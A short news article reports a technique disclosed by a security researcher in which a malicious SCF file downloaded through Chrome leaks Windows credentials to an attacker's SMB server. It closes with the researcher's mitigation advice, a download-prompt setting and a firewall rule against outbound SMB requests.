Security researcher was able to create an SCF file based on a URL.
Just when you thought Microsoft’s recent Windows security patch following the WannaCry attack was going to keep you protected for a while, a new announcement lands in your inbox. This one, which relies on a combination of two different methods of attack, lets outsiders steal your Window credentials with hardly any effort at all.
There’s no question that Google Chrome is the most widely used browser on the planet, and that might be a part of the problem. Chrome makes it far too easy to infect a computer with a malicious SCF file, or shell command file, which is a pretty basic, everyday retrieval tool. Microsoft recently patched up some capabilities of the mundane file types after a wave of attacks based on stolen NSA data (the NSA discovered some Microsoft vulnerabilities and sat on that info in order to use them to their benefit), but SCF file vulnerabilities weren’t closed up in the patch.
SCF file based on URL
It gets worse. A security researcher was able to create an SCF file based on a URL. When the icon image for the SCF was retrieved from an intentionally compromised URL, it “speaks” to a server. According to a detailed report by Catalin Cimpanu for BleepingComputer, “whenever the user’s computer will try to load that icon from this SMB server, the server will ask and receive the user’s login credentials, the user’s computer thinking it needs to authenticate. The problem is that these SMB requests take place even if users want it or not.”
Bosko Stankovic of DefenseCode does have a little suggestion for anyone not wishing to supply their login credentials to any hacker who managed to infect them with a vulnerable SCF file. Chrome users can select their settings preferentially to save each file individually; short of that, Stankovic recommends a firewall that prevents local computers from fulfilling SMB server requests.